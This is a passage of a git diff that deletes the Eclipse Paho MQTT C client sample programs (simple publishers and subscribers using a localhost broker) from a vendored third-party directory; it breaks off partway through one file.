diff --git a/thirdparty/paho.mqtt.c/src/samples/MQTTClient_publish.c b/thirdparty/paho.mqtt.c/src/samples/MQTTClient_publish.c
deleted file mode 100644
index fc71417..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/MQTTClient_publish.c
+++ /dev/null
@@ -1,60 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *******************************************************************************/
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTClient.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientPub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-int main(int argc, char* argv[])
-{
-    MQTTClient client;
-    MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-    MQTTClient_message pubmsg = MQTTClient_message_initializer;
-    MQTTClient_deliveryToken token;
-    int rc;
-
-    MQTTClient_create(&client, ADDRESS, CLIENTID,
-        MQTTCLIENT_PERSISTENCE_NONE, NULL);
-    conn_opts.keepAliveInterval = 20;
-    conn_opts.cleansession = 1;
-
-    if ((rc = MQTTClient_connect(client, &conn_opts)) != MQTTCLIENT_SUCCESS)
-    {
-        printf("Failed to connect, return code %d\n", rc);
-        exit(EXIT_FAILURE);
-    }
-    pubmsg.payload = PAYLOAD;
-    pubmsg.payloadlen = strlen(PAYLOAD);
-    pubmsg.qos = QOS;
-    pubmsg.retained = 0;
-    MQTTClient_publishMessage(client, TOPIC, &pubmsg, &token);
-    printf("Waiting for up to %d seconds for publication of %s\n"
-            "on topic %s for client with ClientID: %s\n",
-            (int)(TIMEOUT/1000), PAYLOAD, TOPIC, CLIENTID);
-    rc = MQTTClient_waitForCompletion(client, token, TIMEOUT);
-    printf("Message with delivery token %d delivered\n", token);
-    MQTTClient_disconnect(client, 10000);
-    MQTTClient_destroy(&client);
-    return rc;
-}
diff --git a/thirdparty/paho.mqtt.c/src/samples/MQTTClient_publish_async.c b/thirdparty/paho.mqtt.c/src/samples/MQTTClient_publish_async.c
deleted file mode 100644
index 7784349..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/MQTTClient_publish_async.c
+++ /dev/null
@@ -1,96 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *******************************************************************************/
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTClient.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientPub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTClient_deliveryToken deliveredtoken;
-
-void delivered(void *context, MQTTClient_deliveryToken dt)
-{
-    printf("Message with token value %d delivery confirmed\n", dt);
-    deliveredtoken = dt;
-}
-
-int msgarrvd(void *context, char *topicName, int topicLen, MQTTClient_message *message)
-{
-    int i;
-    char* payloadptr;
-
-    printf("Message arrived\n");
-    printf("     topic: %s\n", topicName);
-    printf("   message: ");
-
-    payloadptr = message->payload;
-    for(i=0; i<message->payloadlen; i++)
-    {
-        putchar(*payloadptr++);
-    }
-    putchar('\n');
-    MQTTClient_freeMessage(&message);
-    MQTTClient_free(topicName);
-    return 1;
-}
-
-void connlost(void *context, char *cause)
-{
-    printf("\nConnection lost\n");
-    printf("     cause: %s\n", cause);
-}
-
-int main(int argc, char* argv[])
-{
-    MQTTClient client;
-    MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-    MQTTClient_message pubmsg = MQTTClient_message_initializer;
-    MQTTClient_deliveryToken token;
-    int rc;
-
-    MQTTClient_create(&client, ADDRESS, CLIENTID,
-        MQTTCLIENT_PERSISTENCE_NONE, NULL);
-    conn_opts.keepAliveInterval = 20;
-    conn_opts.cleansession = 1;
-
-    MQTTClient_setCallbacks(client, NULL, connlost, msgarrvd, delivered);
-
-    if ((rc = MQTTClient_connect(client, &conn_opts)) != MQTTCLIENT_SUCCESS)
-    {
-        printf("Failed to connect, return code %d\n", rc);
-        exit(EXIT_FAILURE);
-    }
-    pubmsg.payload = PAYLOAD;
-    pubmsg.payloadlen = (int)strlen(PAYLOAD);
-    pubmsg.qos = QOS;
-    pubmsg.retained = 0;
-    deliveredtoken = 0;
-    MQTTClient_publishMessage(client, TOPIC, &pubmsg, &token);
-    printf("Waiting for publication of %s\n"
-            "on topic %s for client with ClientID: %s\n",
-            PAYLOAD, TOPIC, CLIENTID);
-    while(deliveredtoken != token);
-    MQTTClient_disconnect(client, 10000);
-    MQTTClient_destroy(&client);
-    return rc;
-}
diff --git a/thirdparty/paho.mqtt.c/src/samples/MQTTClient_subscribe.c b/thirdparty/paho.mqtt.c/src/samples/MQTTClient_subscribe.c
deleted file mode 100644
index c675ecc..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/MQTTClient_subscribe.c
+++ /dev/null
@@ -1,95 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *******************************************************************************/
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTClient.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientSub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTClient_deliveryToken deliveredtoken;
-
-void delivered(void *context, MQTTClient_deliveryToken dt)
-{
-    printf("Message with token value %d delivery confirmed\n", dt);
-    deliveredtoken = dt;
-}
-
-int msgarrvd(void *context, char *topicName, int topicLen, MQTTClient_message *message)
-{
-    int i;
-    char* payloadptr;
-
-    printf("Message arrived\n");
-    printf("     topic: %s\n", topicName);
-    printf("   message: ");
-
-    payloadptr = message->payload;
-    for(i=0; i<message->payloadlen; i++)
-    {
-        putchar(*payloadptr++);
-    }
-    putchar('\n');
-    MQTTClient_freeMessage(&message);
-    MQTTClient_free(topicName);
-    return 1;
-}
-
-void connlost(void *context, char *cause)
-{
-    printf("\nConnection lost\n");
-    printf("     cause: %s\n", cause);
-}
-
-int main(int argc, char* argv[])
-{
-    MQTTClient client;
-    MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-    int rc;
-    int ch;
-
-    MQTTClient_create(&client, ADDRESS, CLIENTID,
-        MQTTCLIENT_PERSISTENCE_NONE, NULL);
-    conn_opts.keepAliveInterval = 20;
-    conn_opts.cleansession = 1;
-
-    MQTTClient_setCallbacks(client, NULL, connlost, msgarrvd, delivered);
-
-    if ((rc = MQTTClient_connect(client, &conn_opts)) != MQTTCLIENT_SUCCESS)
-    {
-        printf("Failed to connect, return code %d\n", rc);
-        exit(EXIT_FAILURE);
-    }
-    printf("Subscribing to topic %s\nfor client %s using QoS%d\n\n"
-           "Press Q<Enter> to quit\n\n", TOPIC, CLIENTID, QOS);
-    MQTTClient_subscribe(client, TOPIC, QOS);
-
-    do 
-    {
-        ch = getchar();
-    } while(ch!='Q' && ch != 'q');
-
-    MQTTClient_unsubscribe(client, TOPIC);
-    MQTTClient_disconnect(client, 10000);
-    MQTTClient_destroy(&client);
-    return rc;
-}
diff --git a/thirdparty/paho.mqtt.c/src/samples/paho_c_pub.c b/thirdparty/paho.mqtt.c/src/samples/paho_c_pub.c
deleted file mode 100644
index 1a4040d..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/paho_c_pub.c
+++ /dev/null
@@ -1,379 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2016 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *    Guilherme Maciel Ferreira - add keep alive option
- *******************************************************************************/
-
- /*
- stdin publisher
-
- compulsory parameters:
-
-  --topic topic to publish on
-
- defaulted parameters:
-
-	--host localhost
-	--port 1883
-	--qos 0
-	--delimiters \n
-	--clientid stdin-publisher-async
-	--maxdatalen 100
-	--keepalive 10
-
-	--userid none
-	--password none
-
-*/
-
-#include "MQTTAsync.h"
-
-#include <stdio.h>
-#include <signal.h>
-#include <string.h>
-#include <stdlib.h>
-
-#if defined(WIN32)
-#include <windows.h>
-#define sleep Sleep
-#else
-#include <unistd.h>
-#include <sys/time.h>
-#include <unistd.h>
-#endif
-
-#include <OsWrapper.h>
-
-volatile int toStop = 0;
-
-
-struct
-{
-	char* clientid;
-	char* delimiter;
-	int maxdatalen;
-	int qos;
-	int retained;
-	char* username;
-	char* password;
-	char* host;
-	char* port;
-	int verbose;
-	int keepalive;
-} opts =
-{
-	"stdin-publisher-async", "\n", 100, 0, 0, NULL, NULL, "localhost", "1883", 0, 10
-};
-
-
-void usage(void)
-{
-	printf("MQTT stdin publisher\n");
-	printf("Usage: stdinpub topicname <options>, where options are:\n");
-	printf("  --host <hostname> (default is %s)\n", opts.host);
-	printf("  --port <port> (default is %s)\n", opts.port);
-	printf("  --qos <qos> (default is %d)\n", opts.qos);
-	printf("  --retained (default is %s)\n", opts.retained ? "on" : "off");
-	printf("  --delimiter <delim> (default is \\n)\n");
-	printf("  --clientid <clientid> (default is %s)\n", opts.clientid);
-	printf("  --maxdatalen <bytes> (default is %d)\n", opts.maxdatalen);
-	printf("  --username none\n");
-	printf("  --password none\n");
-	printf("  --keepalive <seconds> (default is 10 seconds)\n");
-	exit(EXIT_FAILURE);
-}
-
-
-
-void cfinish(int sig)
-{
-	signal(SIGINT, NULL);
-	toStop = 1;
-}
-
-void getopts(int argc, char** argv);
-
-int messageArrived(void* context, char* topicName, int topicLen, MQTTAsync_message* m)
-{
-	/* not expecting any messages */
-	return 1;
-}
-
-
-static int disconnected = 0;
-
-void onDisconnect(void* context, MQTTAsync_successData* response)
-{
-	disconnected = 1;
-}
-
-
-static int connected = 0;
-void myconnect(MQTTAsync* client);
-
-void onConnectFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Connect failed, rc %d\n", response ? response->code : -1);
-	connected = -1;
-
-	MQTTAsync client = (MQTTAsync)context;
-	myconnect(client);
-}
-
-
-void onConnect(void* context, MQTTAsync_successData* response)
-{
-	printf("Connected\n");
-	connected = 1;
-}
-
-void myconnect(MQTTAsync* client)
-{
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	MQTTAsync_SSLOptions ssl_opts = MQTTAsync_SSLOptions_initializer;
-	int rc = 0;
-
-	printf("Connecting\n");
-	conn_opts.keepAliveInterval = opts.keepalive;
-	conn_opts.cleansession = 1;
-	conn_opts.username = opts.username;
-	conn_opts.password = opts.password;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	ssl_opts.enableServerCertAuth = 0;
-	conn_opts.ssl = &ssl_opts;
-	conn_opts.automaticReconnect = 1;
-	connected = 0;
-	if ((rc = MQTTAsync_connect(*client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-static int published = 0;
-
-void onPublishFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Publish failed, rc %d\n", response ? -1 : response->code);
-	published = -1;
-}
-
-
-void onPublish(void* context, MQTTAsync_successData* response)
-{
-	published = 1;
-}
-
-
-void connectionLost(void* context, char* cause)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	MQTTAsync_SSLOptions ssl_opts = MQTTAsync_SSLOptions_initializer;
-	int rc = 0;
-
-	printf("Connecting\n");
-	conn_opts.keepAliveInterval = 10;
-	conn_opts.cleansession = 1;
-	conn_opts.username = opts.username;
-	conn_opts.password = opts.password;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	ssl_opts.enableServerCertAuth = 0;
-	conn_opts.ssl = &ssl_opts;
-	connected = 0;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-int main(int argc, char** argv)
-{
-	MQTTAsync_disconnectOptions disc_opts = MQTTAsync_disconnectOptions_initializer;
-	MQTTAsync_responseOptions pub_opts = MQTTAsync_responseOptions_initializer;
-	MQTTAsync_createOptions create_opts = MQTTAsync_createOptions_initializer;
-	MQTTAsync client;
-	char* topic = NULL;
-	char* buffer = NULL;
-	int rc = 0;
-	char url[100];
-
-	if (argc < 2)
-		usage();
-
-	getopts(argc, argv);
-
-	sprintf(url, "%s:%s", opts.host, opts.port);
-	if (opts.verbose)
-		printf("URL is %s\n", url);
-
-	topic = argv[1];
-	printf("Using topic %s\n", topic);
-
-	create_opts.sendWhileDisconnected = 1;
-	rc = MQTTAsync_createWithOptions(&client, url, opts.clientid, MQTTCLIENT_PERSISTENCE_NONE, NULL, &create_opts);
-
-	signal(SIGINT, cfinish);
-	signal(SIGTERM, cfinish);
-
-	rc = MQTTAsync_setCallbacks(client, client, connectionLost, messageArrived, NULL);
-
-	myconnect(&client);
-
-	buffer = malloc(opts.maxdatalen);
-
-	while (!toStop)
-	{
-		int data_len = 0;
-		int delim_len = 0;
-
-		delim_len = (int)strlen(opts.delimiter);
-		do
-		{
-			buffer[data_len++] = getchar();
-			if (data_len > delim_len)
-			{
-			/* printf("comparing %s %s\n", opts.delimiter, &buffer[data_len - delim_len]); */
-			if (strncmp(opts.delimiter, &buffer[data_len - delim_len], delim_len) == 0)
-				break;
-			}
-		} while (data_len < opts.maxdatalen);
-
-		if (opts.verbose)
-				printf("Publishing data of length %d\n", data_len);
-		pub_opts.onSuccess = onPublish;
-		pub_opts.onFailure = onPublishFailure;
-		do
-		{
-			rc = MQTTAsync_send(client, topic, data_len, buffer, opts.qos, opts.retained, &pub_opts);
-		}
-		while (rc != MQTTASYNC_SUCCESS);
-	}
-
-	printf("Stopping\n");
-
-	free(buffer);
-
-	disc_opts.onSuccess = onDisconnect;
-	if ((rc = MQTTAsync_disconnect(client, &disc_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start disconnect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	while	(!disconnected)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	MQTTAsync_destroy(&client);
-
-	return EXIT_SUCCESS;
-}
-
-void getopts(int argc, char** argv)
-{
-	int count = 2;
-
-	while (count < argc)
-	{
-		if (strcmp(argv[count], "--retained") == 0)
-			opts.retained = 1;
-		if (strcmp(argv[count], "--verbose") == 0)
-			opts.verbose = 1;
-		else if (strcmp(argv[count], "--qos") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp(argv[count], "0") == 0)
-					opts.qos = 0;
-				else if (strcmp(argv[count], "1") == 0)
-					opts.qos = 1;
-				else if (strcmp(argv[count], "2") == 0)
-					opts.qos = 2;
-				else
-					usage();
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--host") == 0)
-		{
-			if (++count < argc)
-				opts.host = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--port") == 0)
-		{
-			if (++count < argc)
-				opts.port = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--clientid") == 0)
-		{
-			if (++count < argc)
-				opts.clientid = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--username") == 0)
-		{
-			if (++count < argc)
-				opts.username = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--password") == 0)
-		{
-			if (++count < argc)
-				opts.password = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--maxdatalen") == 0)
-		{
-			if (++count < argc)
-				opts.maxdatalen = atoi(argv[count]);
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--delimiter") == 0)
-		{
-			if (++count < argc)
-				opts.delimiter = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--keepalive") == 0)
-		{
-			if (++count < argc)
-				opts.keepalive = atoi(argv[count]);
-			else
-				usage();
-		}
-		count++;
-	}
-
-}
diff --git a/thirdparty/paho.mqtt.c/src/samples/paho_c_sub.c b/thirdparty/paho.mqtt.c/src/samples/paho_c_sub.c
deleted file mode 100644
index bbb5edd..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/paho_c_sub.c
+++ /dev/null
@@ -1,359 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *    Ian Craggs - fix for bug 413429 - connectionLost not called
- *    Guilherme Maciel Ferreira - add keep alive option
- *******************************************************************************/
-
-/*
-
- stdout subscriber for the asynchronous client
-
- compulsory parameters:
-
-  --topic topic to subscribe to
-
- defaulted parameters:
-
-	--host localhost
-	--port 1883
-	--qos 2
-	--delimiter \n
-	--clientid stdout-subscriber-async
-	--showtopics off
-	--keepalive 10
-
-	--userid none
-	--password none
-
-*/
-
-#include "MQTTAsync.h"
-#include "MQTTClientPersistence.h"
-
-#include <stdio.h>
-#include <signal.h>
-#include <string.h>
-#include <stdlib.h>
-
-
-#if defined(WIN32)
-#include <windows.h>
-#define sleep Sleep
-#else
-#include <sys/time.h>
-#include <unistd.h>
-#endif
-
-#include <OsWrapper.h>
-
-volatile int finished = 0;
-char* topic = NULL;
-int subscribed = 0;
-int disconnected = 0;
-
-
-void cfinish(int sig)
-{
-	signal(SIGINT, NULL);
-	finished = 1;
-}
-
-
-struct
-{
-	char* clientid;
-	int nodelimiter;
-	char delimiter;
-	int qos;
-	char* username;
-	char* password;
-	char* host;
-	char* port;
-	int showtopics;
-	int keepalive;
-} opts =
-{
-	"stdout-subscriber-async", 1, '\n', 2, NULL, NULL, "localhost", "1883", 0, 10
-};
-
-
-void usage(void)
-{
-	printf("MQTT stdout subscriber\n");
-	printf("Usage: stdoutsub topicname <options>, where options are:\n");
-	printf("  --host <hostname> (default is %s)\n", opts.host);
-	printf("  --port <port> (default is %s)\n", opts.port);
-	printf("  --qos <qos> (default is %d)\n", opts.qos);
-	printf("  --delimiter <delim> (default is no delimiter)\n");
-	printf("  --clientid <clientid> (default is %s)\n", opts.clientid);
-	printf("  --username none\n");
-	printf("  --password none\n");
-	printf("  --showtopics <on or off> (default is on if the topic has a wildcard, else off)\n");
-	printf("  --keepalive <seconds> (default is 10 seconds)\n");
-	exit(EXIT_FAILURE);
-}
-
-
-void getopts(int argc, char** argv)
-{
-	int count = 2;
-
-	while (count < argc)
-	{
-		if (strcmp(argv[count], "--qos") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp(argv[count], "0") == 0)
-					opts.qos = 0;
-				else if (strcmp(argv[count], "1") == 0)
-					opts.qos = 1;
-				else if (strcmp(argv[count], "2") == 0)
-					opts.qos = 2;
-				else
-					usage();
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--host") == 0)
-		{
-			if (++count < argc)
-				opts.host = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--port") == 0)
-		{
-			if (++count < argc)
-				opts.port = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--clientid") == 0)
-		{
-			if (++count < argc)
-				opts.clientid = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--username") == 0)
-		{
-			if (++count < argc)
-				opts.username = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--password") == 0)
-		{
-			if (++count < argc)
-				opts.password = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--delimiter") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp("newline", argv[count]) == 0)
-					opts.delimiter = '\n';
-				else
-					opts.delimiter = argv[count][0];
-				opts.nodelimiter = 0;
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--showtopics") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp(argv[count], "on") == 0)
-					opts.showtopics = 1;
-				else if (strcmp(argv[count], "off") == 0)
-					opts.showtopics = 0;
-				else
-					usage();
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--keepalive") == 0)
-		{
-			if (++count < argc)
-				opts.keepalive = atoi(argv[count]);
-			else
-				usage();
-		}
-		count++;
-	}
-
-}
-
-
-int messageArrived(void *context, char *topicName, int topicLen, MQTTAsync_message *message)
-{
-	if (opts.showtopics)
-		printf("%s\t", topicName);
-	if (opts.nodelimiter)
-		printf("%.*s", message->payloadlen, (char*)message->payload);
-	else
-		printf("%.*s%c", message->payloadlen, (char*)message->payload, opts.delimiter);
-	fflush(stdout);
-	MQTTAsync_freeMessage(&message);
-	MQTTAsync_free(topicName);
-	return 1;
-}
-
-
-void onDisconnect(void* context, MQTTAsync_successData* response)
-{
-	disconnected = 1;
-}
-
-
-void onSubscribe(void* context, MQTTAsync_successData* response)
-{
-	subscribed = 1;
-}
-
-
-void onSubscribeFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Subscribe failed, rc %d\n", response->code);
-	finished = 1;
-}
-
-
-void onConnectFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Connect failed, rc %d\n", response ? response->code : -99);
-	finished = 1;
-}
-
-
-void onConnect(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_responseOptions ropts = MQTTAsync_responseOptions_initializer;
-	int rc;
-
-	if (opts.showtopics)
-		printf("Subscribing to topic %s with client %s at QoS %d\n", topic, opts.clientid, opts.qos);
-
-	ropts.onSuccess = onSubscribe;
-	ropts.onFailure = onSubscribeFailure;
-	ropts.context = client;
-	if ((rc = MQTTAsync_subscribe(client, topic, opts.qos, &ropts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start subscribe, return code %d\n", rc);
-		finished = 1;
-	}
-}
-
-
-MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-
-
-void connectionLost(void *context, char *cause)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	int rc;
-
-	printf("connectionLost called\n");
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start reconnect, return code %d\n", rc);
-		finished = 1;
-	}
-}
-
-
-int main(int argc, char** argv)
-{
-	MQTTAsync client;
-	MQTTAsync_disconnectOptions disc_opts = MQTTAsync_disconnectOptions_initializer;
-	int rc = 0;
-	char url[100];
-
-	if (argc < 2)
-		usage();
-
-	topic = argv[1];
-
-	if (strchr(topic, '#') || strchr(topic, '+'))
-		opts.showtopics = 1;
-	if (opts.showtopics)
-		printf("topic is %s\n", topic);
-
-	getopts(argc, argv);
-	sprintf(url, "%s:%s", opts.host, opts.port);
-
-	rc = MQTTAsync_create(&client, url, opts.clientid, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	MQTTAsync_setCallbacks(client, client, connectionLost, messageArrived, NULL);
-
-	signal(SIGINT, cfinish);
-	signal(SIGTERM, cfinish);
-
-	conn_opts.keepAliveInterval = opts.keepalive;
-	conn_opts.cleansession = 1;
-	conn_opts.username = opts.username;
-	conn_opts.password = opts.password;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	while (!subscribed)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	if (finished)
-		goto exit;
-
-	while (!finished)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	disc_opts.onSuccess = onDisconnect;
-	if ((rc = MQTTAsync_disconnect(client, &disc_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start disconnect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	while	(!disconnected)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-exit:
-	MQTTAsync_destroy(&client);
-
-	return EXIT_SUCCESS;
-}
diff --git a/thirdparty/paho.mqtt.c/src/samples/paho_cs_pub.c b/thirdparty/paho.mqtt.c/src/samples/paho_cs_pub.c
deleted file mode 100644
index 04ce688..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/paho_cs_pub.c
+++ /dev/null
@@ -1,276 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *******************************************************************************/
-
- /*
- stdin publisher
-
- compulsory parameters:
-
-  --topic topic to publish on
-
- defaulted parameters:
-
-	--host localhost
-	--port 1883
-	--qos 0
-	--delimiters \n
-	--clientid stdin_publisher
-	--maxdatalen 100
-
-	--userid none
-	--password none
-
-*/
-
-#include "MQTTClient.h"
-#include "MQTTClientPersistence.h"
-
-#include <stdio.h>
-#include <signal.h>
-#include <string.h>
-#include <stdlib.h>
-
-#if defined(WIN32)
-#define sleep Sleep
-#else
-#include <sys/time.h>
-#endif
-
-
-volatile int toStop = 0;
-
-
-void usage(void)
-{
-	printf("MQTT stdin publisher\n");
-	printf("Usage: stdinpub topicname <options>, where options are:\n");
-	printf("  --host <hostname> (default is localhost)\n");
-	printf("  --port <port> (default is 1883)\n");
-	printf("  --qos <qos> (default is 0)\n");
-	printf("  --retained (default is off)\n");
-	printf("  --delimiter <delim> (default is \\n)");
-	printf("  --clientid <clientid> (default is hostname+timestamp)");
-	printf("  --maxdatalen 100\n");
-	printf("  --username none\n");
-	printf("  --password none\n");
-	exit(EXIT_FAILURE);
-}
-
-
-void myconnect(MQTTClient* client, MQTTClient_connectOptions* opts)
-{
-	printf("Connecting\n");
-	if (MQTTClient_connect(*client, opts) != 0)
-	{
-		printf("Failed to connect\n");
-		exit(EXIT_FAILURE);
-	}
-	printf("Connected\n");
-}
-
-
-void cfinish(int sig)
-{
-	signal(SIGINT, NULL);
-	toStop = 1;
-}
-
-
-struct
-{
-	char* clientid;
-	char* delimiter;
-	int maxdatalen;
-	int qos;
-	int retained;
-	char* username;
-	char* password;
-	char* host;
-	char* port;
-  int verbose;
-} opts =
-{
-	"publisher", "\n", 100, 0, 0, NULL, NULL, "localhost", "1883", 0
-};
-
-void getopts(int argc, char** argv);
-
-int messageArrived(void* context, char* topicName, int topicLen, MQTTClient_message* m)
-{
-	/* not expecting any messages */
-	return 1;
-}
-
-int main(int argc, char** argv)
-{
-	MQTTClient client;
-	MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-	MQTTClient_SSLOptions ssl_opts = MQTTClient_SSLOptions_initializer;
-	char* topic = NULL;
-	char* buffer = NULL;
-	int rc = 0;
-	char url[100];
-
-	if (argc < 2)
-		usage();
-
-	getopts(argc, argv);
-
-	sprintf(url, "%s:%s", opts.host, opts.port);
-	if (opts.verbose)
-		printf("URL is %s\n", url);
-
-	topic = argv[1];
-	printf("Using topic %s\n", topic);
-
-	rc = MQTTClient_create(&client, url, opts.clientid, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	signal(SIGINT, cfinish);
-	signal(SIGTERM, cfinish);
-
-	rc = MQTTClient_setCallbacks(client, NULL, NULL, messageArrived, NULL);
-
-	conn_opts.keepAliveInterval = 10;
-	conn_opts.reliable = 0;
-	conn_opts.cleansession = 1;
-	conn_opts.username = opts.username;
-	conn_opts.password = opts.password;
-	ssl_opts.enableServerCertAuth = 0;
-	conn_opts.ssl = &ssl_opts;
-
